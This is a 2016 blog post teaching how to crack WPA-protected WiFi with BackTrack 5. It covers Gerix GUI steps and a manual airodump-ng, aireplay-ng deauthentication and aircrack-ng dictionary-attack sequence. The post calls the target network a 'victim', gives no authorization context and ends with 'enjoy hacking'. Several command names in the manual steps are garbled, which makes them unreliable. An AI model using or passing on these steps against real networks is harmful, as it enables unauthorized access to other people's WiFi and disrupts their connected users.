Sunday, October 30, 2016

How to Hack wifi using back track 5





Hi friends today I am going to tell you how to hack WiFi w pa security. I am using the backtrack5 operating system to hack wifi. In my recent recent posts I told you how to install backtrack5 r1  


operating system in dual boot that is in conjuction with windows OS. In bt5 there is an application gerix wifi cracker-mg which is used to hack WiFi. I will show you both GUI version and manual steps (command based).

HEre is GUI steps:-
go to applications> exploitation tools> wireless exploitation> wlan exploitation> Geri-wifi-cracker-ng.


In Gerix:-
Configure: go to configuration
1) set card to monitor mode. Highlight Monitor Mode, then.
2) rescan networks. (hightlight networks)
3) Highlight Network, and monitor card, clean old session, now goto WPA tab.
4) in wpa tab, click 1st start sniffing.
#Auto Load victim
#Client deAuthentication
5) now go to cracking tab. click on WPA bruteforce cracking.
6) in normal cracking, add the path of dictionary as in given below.
7) Run the crack on the test file, put your password in the list to test.


Once you get the handshake goto crack wpa, and select your dictionary file in, normal cracking.
File location /darkc0de.lst
root@bt:/pentest/passwords/wordlists# pwd
/pentest/passwords/wordlists/darkc0de.lst here o in darkc0de is a zero not O.
then press aircrack-ng crack WPA password button...
cracking is start.........


Here is Manual Steps for doing the all process of gerix-cracker.
Steps:
1)airmen-ng
2)airman-ng start wlan0
3)airdrop-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -0 5 -a (bssid) mon0
6)aircrack-ng (filename)*.cap -w (dictionary location)
 
 


NOTE: I am using default dictionary of bt5 and cracking is done according to the dictionary. This dictionary can only break alphanumeric passwords. For better results, download more efficient dictionaries....
Keep visiting for more tips n tricks n enjoy hacking......

No comments:

Post a Comment